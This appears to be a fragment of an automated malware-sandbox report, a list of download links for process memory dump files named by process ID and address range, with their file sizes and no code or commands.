Download
memory/3972-2198-0x000001FF59930000-0x000001FF59986000-memory.dmp

Filesize
344KB

Download
memory/3972-62-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-30-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-8-0x0000000000400000-0x00000000004AA000-memory.dmp

Filesize
680KB

Download
memory/3972-64-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-28-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-26-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-24-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-52-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-20-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-18-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-16-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-15-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-14-0x000001FF59820000-0x000001FF59830000-memory.dmp

Filesize
64KB

Download
memory/3972-66-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-13-0x00007FF837730000-0x00007FF8381F1000-memory.dmp

Filesize
10.8MB

Download
memory/3972-2197-0x000001FF40F80000-0x000001FF40F88000-memory.dmp

Filesize
32KB

Download
memory/3972-76-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-74-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-72-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-70-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/3972-11-0x000001FF596D0000-0x000001FF597B4000-memory.dmp

Filesize
912KB

Download
memory/3972-68-0x000001FF596D0000-0x000001FF597B0000-memory.dmp

Filesize
896KB

Download
memory/4004-6649-0x0000025E36520000-0x0000025E36560000-memory.dmp

Filesize
256KB

Download
memory/4004-6643-0x0000000140000000-0x00000001407CF000-memory.dmp

Filesize
7.8MB

Download
memory/4036-5-0x0000021E00100000-0x0000021E00110000-memory.dmp

Filesize
64KB

Download
memory/4036-12-0x00007FF837730000-0x00007FF8381F1000-memory.dmp

Filesize
10.8MB

Download
memory/4036-0-0x0000021E65A70000-0x0000021E65BA8000-memory.dmp

Filesize
1.2MB

Download
memory/4036-1-0x0000021E00110000-0x0000021E001F2000-memory.dmp

Filesize
904KB

Download
memory/4036-7-0x0000021E00570000-0x0000021E005BC000-memory.dmp

Filesize
304KB

Download
memory/4036-6-0x0000021E004A0000-0x0000021E00568000-memory.dmp

Filesize
800KB

Download
memory/4036-4-0x0000021E002D0000-0x0000021E00398000-memory.dmp

Filesize
800KB

Download
memory/4036-3-0x00007FF837730000-0x00007FF8381F1000-memory.dmp

Filesize
10.8MB

Download
memory/4036-2-0x0000021E001F0000-0x0000021E002D0000-memory.dmp

Filesize
896KB

Download
memory/4148-6635-0x000001FCD8990000-0x000001FCD89A0000-memory.dmp

Filesize
64KB

Download
memory/4148-6634-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/4148-6651-0x000001FCD8990000-0x000001FCD89A0000-memory.dmp

Filesize
64KB

Download
memory/4148-6650-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/4148-6638-0x000001FCD8990000-0x000001FCD89A0000-memory.dmp

Filesize
64KB

Download
memory/4148-6637-0x000001FCD8990000-0x000001FCD89A0000-memory.dmp

Filesize
64KB

Download
memory/4252-2204-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/4252-2205-0x000002D1A6340000-0x000002D1A6350000-memory.dmp

Filesize
64KB

Download
memory/4252-2212-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/4464-6613-0x00000177058E0000-0x00000177058F0000-memory.dmp

Filesize
64KB

Download
memory/4464-6589-0x00000177058E0000-0x00000177058F0000-memory.dmp

Filesize
64KB

Download
memory/4464-4403-0x00000177058E0000-0x00000177058F0000-memory.dmp

Filesize
64KB

Download
memory/4464-6590-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download
memory/4464-6602-0x00000177058E0000-0x00000177058F0000-memory.dmp

Filesize
64KB

Download
memory/4464-4402-0x00007FF837AB0000-0x00007FF838571000-memory.dmp

Filesize
10.8MB

Download